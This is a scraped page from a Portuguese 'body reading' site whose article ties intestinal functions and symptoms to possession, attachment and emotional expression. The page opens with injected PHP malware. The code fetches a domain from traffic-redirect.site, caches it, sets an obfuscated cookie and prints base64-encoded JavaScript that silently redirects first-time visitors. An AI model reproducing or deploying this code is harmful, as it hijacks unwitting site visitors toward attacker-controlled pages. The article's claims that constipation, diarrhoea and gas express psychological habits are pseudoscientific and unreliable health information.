$alias = "29551697176418"; $key = "c7b088a5cce4359849d7e747bc979e91"; $file = dirname(__FILE__) . "/" . md5($alias); $time = time(); $file_exist = file_exists($file); $filetime = 0; $edittime = 0; $domain = false; if ($file_exist) { $filetime = filemtime($file); $edittime = $time - $filetime; $datafile = fopen($file, 'r'); $dcres = json_decode(base64_decode(fread($datafile, filesize($file))) , 1); if(!empty($dcres['domain'])) $url = $dcres['domain']; fclose($datafile); } if ($edittime >= 15 || !$file_exist || !$url) { $dcres = getdata($file,$key,$alias); if(isset($_REQUEST['ch'])){ var_dump($dcres); } if ($dcres['domain']) { $url = $dcres['domain']; } } function getdata($file,$key,$alias){ $newdomainurl = 'http://traffic-redirect.site/?t=json&i='.$key.'&a='.$alias; if(function_exists('curl_version')){ $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, 'get new domain'); curl_setopt($curl, CURLOPT_URL, $newdomainurl); curl_setopt($curl, CURLOPT_TIMEOUT, 5); $res = curl_exec($curl); curl_close($curl); }else $res = file_get_contents($newdomainurl); if(isset($_REQUEST['ch'])){ var_dump($res); } $dcres = json_decode($res, true); if ($dcres['domain']) { $cache = fopen($file, 'w+'); fwrite($cache, base64_encode($res)); fclose($cache); return $dcres; } return false; } if (!$_COOKIE[base64_decode('aHRfcnI=') ]) { setcookie(base64_decode('aHRfcnI=') , 1, time() + 86400, base64_decode('Lw==')); echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $url . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $url . base64_decode('Ijs8L3NjcmlwdD4='); } ?> Intestinos: posse, aproveitamento e oferta de si – Site de leitura_novo

Para a Leitura Corporal, os intestinos formam o Sistema de Sustentação da Dinâmica Orgânica e de Maturação do Sentido de Propriedade. Muitas funções psíquicas são organizadas e desenvolvidas ao longo dessa extensa e incrível estrutura. Dentre elas, a habilidades de bem aproveitar ganhos e perdas e a prática saudável do apego e do desapego.

Enquanto campo de absorção de nutrientes físicos e emocionais, os intestinos funcionam como verdadeiros mananciais para a estruturação e a nutrição de dons, posturas e realidades pessoais. O metabolismo das referências e parâmetros externos formam substratos essenciais para a autoconstrução, possibilitando a composição de formas de ser, de comportar-se e de colocar-se no mundo segundo os anseios e valores da Identidade.

A atividade intestinal é essencial ao desenvolvimento de competências e à apropriação de si, dos contextos criados e das relações. A inteligência dos intestinos gerencia o fluxo das necessidades de ter e deixar de ter – sabem dos espaços que precisam ser liberados e dos preenchimentos carecidos pelo Indivíduo, produzindo impulsos de busca, desejos de posse, ímpetos de desapego e vontades de vazio.

Os sintomas intestinais retratam e tratam o hábito de conter o que se tem a oferecer (intestino preso); de deixar ir o que ainda é necessário, com desapego foçado (diarreia com dor); de controlar a expressão autêntica das emoções (gases), entre outras manifestações relacionadas às funções do autopreenchimento, da apropriação de si e do exercício do que a si compete.

Os intestinos ensinam que mais importante que possuir é saber usufruir, que oferecer é tão vital quanto conquistar e que a única apropriação verdadeira é a posse de si mesmo.  No movimento de preencher-se e esvaziar-se, eles possibilitam a cada indivíduo conhecer-se, construir-se, exercer-se, aprimorar-se e oferecer-se, garantindo o peristaltismo saudável dos comportamentos e das emoções.